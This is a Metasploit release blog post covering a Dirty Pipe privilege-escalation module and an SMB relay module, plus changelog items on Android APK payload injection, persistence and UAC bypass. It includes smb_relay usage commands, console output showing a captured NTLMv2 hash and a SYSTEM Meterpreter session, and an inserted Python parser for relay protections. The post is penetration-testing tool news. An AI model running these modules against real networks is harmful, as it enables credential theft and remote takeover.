Last updated at Mon, 05 Feb 2024 21:44:02 GMT

Mucking out the pipes.

Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber's training. The exploit, which targets modern Linux v5 kernels, elevates user privileges by overwriting a SUID binary of your choice, plunging some payload gold through a pipe.

Long live the SMB relay!

SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7, the windows/smb/smb_relay module, which had been languishing in disuse due to evolutions in the protocol, is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets, which Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:...

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.
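As an added illustration, not part of the original post or of the smb_relay module's own code, of what the captured NTLMv2-SSP hash line above actually contains: the blob after NTProofStr carries the client's timestamp, nonce and AV pairs, and whether those pairs include a target name (EPA) or channel bindings tells a defender whether that client's authentication could be bound to one service at all. The sample line is constructed here (the challenge and NTProofStr are copied from the output above; the blob is built by the hypothetical build_blob helper), and the AV-pair parsing follows the MS-NLMP layout rather than anything from the page.

```python
import struct
from datetime import datetime, timedelta, timezone
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",  # MS-NLMP AvId
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}

def parse_hash_line(line):
    """Split a JOHNPWFILE-style NTLMv2 line: user::domain:challenge:NTProofStr:blob."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "server_challenge": bytes.fromhex(challenge),
            "ntproofstr": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}

def parse_blob(blob):
    """Decode the NTLMv2_CLIENT_CHALLENGE that follows NTProofStr (MS-NLMP 2.2.2.7)."""
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge")
    filetime, nonce = struct.unpack_from("<Q8s", blob, 8)  # TimeStamp, ChallengeFromClient
    when = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)  # FILETIME is 100 ns ticks
    pairs, off = {}, 28                                      # AvPairs start after Reserved3
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        value, off = blob[off + 4:off + 4 + av_len], off + 4 + av_len
        if av_id == 0:                                       # MsvAvEOL ends the list
            return {"timestamp": when, "client_challenge": nonce, "av_pairs": pairs}
        if av_id in (1, 2, 3, 4, 5, 9):
            value = value.decode("utf-16-le")
        elif av_id == 6:
            value = struct.unpack("<I", value)[0]
        pairs[AV_NAMES.get(av_id, av_id)] = value

def relay_protections(av_pairs):
    """What a defender looks for: MIC flag (0x2), EPA service binding, TLS channel binding."""
    return {"mic": bool(av_pairs.get("Flags", 0) & 0x2), "target_name": av_pairs.get("TargetName"),
            "channel_bindings": "ChannelBindings" in av_pairs}

def build_blob(when, nonce, pairs):
    # Hypothetical helper that constructs a blob for the sample below; a real one comes from the capture file.
    filetime = ((when - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    out = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q8s", filetime, nonce) + b"\x00" * 4
    for av_id, value in pairs:
        value = value.encode("utf-16-le") if isinstance(value, str) else value
        out += struct.pack("<HH", av_id, len(value)) + value
    return out + struct.pack("<HH", 0, 0)

# Constructed sample line in the page's capture format: challenge and NTProofStr copied from the
# post, blob built here. No TargetName/ChannelBindings pair means nothing ties it to one service.
SAMPLE_BLOB = build_blob(datetime(2022, 3, 2, 22, 24, 42, tzinfo=timezone.utc), b"\x11" * 8,
                         [(1, "DESKTOP-N3MAG5R"), (2, "WORKGROUP"), (6, struct.pack("<I", 2))])
SAMPLE_LINE = "admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:" + SAMPLE_BLOB.hex()
```

Run parse_hash_line on a line from JOHNPWFILE, then parse_blob and relay_protections on its blob; a client whose AV pairs carry a TargetName and ChannelBindings is one a signing-enforced or EPA-protected service can refuse to accept from a relay.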

Return of the GSoC!

The Metasploit project is proud to return to Google Summer of Code for 2022. Contributor applications will open April 4th and close April 19th. Changes this year open the program up to all newcomers to open source who are 18 years and older. Join us on Slack and check out our How-To and Ideas pages to get started. We are still expanding on ideas and are eager to see what you'd like to add to Metasploit.

New module content (5)

Enhancements and features

  • #16135 from sjanusz-r7 - This adds support for logging Meterpreter's TLV Packets with setg SessionTlvLogging true. Other values for the SessionTlvLogging option include console, false, and file:<file_location>.
  • #16141 from adfoster-r7 - This adds service manager commands to msfconsole.
  • #16219 from sjanusz-r7 - This updates the packet inspection for the enumextcmd and loadlib commands to log human readable string identifiers in addition to the integer value command ids that were introduced as part of Metasploit 6.
  • #16258 from sjanusz-r7 - This improves Meterpreter's TLV logging support to show human-readable names for Meterpreter TLV values. To view this functionality, run setg SessionTlvLogging true with a Meterpreter session open, then run a Meterpreter command such as dir.
  • #16269 from bcoles - This improves validation for Android payloads to verify Java is correctly installed and apktool.jar exists in the same directory as apktool.
  • #16270 from bcoles - This improves validation for Android payloads to notify the user if a keytool error is present, such as being unable to parse the provided APK file or certificate.
  • #16282 from 3V3RYONE - This adds the lcat command to Meterpreter which allows the user to cat a local file.
  • #16288 from bcoles - This change displays the output of apktool if that output contains Java exceptions, which is useful for debugging errors in Android APK injection.

Bugs fixed

  • #16145 from adfoster-r7 - This fixes a case sensitivity issue with option handling for the to_handler command on Metasploit payloads. Previously, setting an LPORT value within a payload would not correctly override the previously set lport value.
  • #16153 from jmartin-r7 - This fixes a bug in the auxiliary/client/smtp/emailer which previously handled multiline SMTP responses incorrectly, stopping the module from emailing the payload successfully.
  • #16265 from smashery - This fixes an edge case which led to a running job being cleaned up twice, causing unintended errors. Now the job is only cleaned up once.
  • #16268 from bwatters-r7 - This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.
  • #16283 from bcoles - This change fixes an error when attempting to inject into an unsigned APK file. A suitable error message is now displayed.
  • #16286 from bcoles - This fixes a payload truncation issue in post/windows/manage/persistence_exe on Windows systems caused by the usage of IO.read.
  • #16294 from bcoles - This change fixes the Android APK injection functionality of msfvenom to use the new signing tool apksigner instead of jarsigner, which allows the applications to install successfully on the latest version of Android (Android 11).
  • #16310 from adfoster-r7 - This fixes an edge case where setting multiple RHOST values for a module which did not support this option would cause the module to run multiple times instead of once.
  • #16311 from sjanusz-r7 - This updates msfconsole's search functionality to include the 64-bit variant of the payload_windows/x64/encrypted_shell payloads.
  • #16312 from bwatters-r7 - This fixes two issues with the pwnkit exploit for CVE-2021-4034. The first issue fixed was a compatibility check between the target host architecture and the payload. The second issue fixed was with the on session callback that sets the current working directory.
  • #16322 from zeroSteiner - This fixes a regression issue with the hosts command tab completion and the --search option’s functionality.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).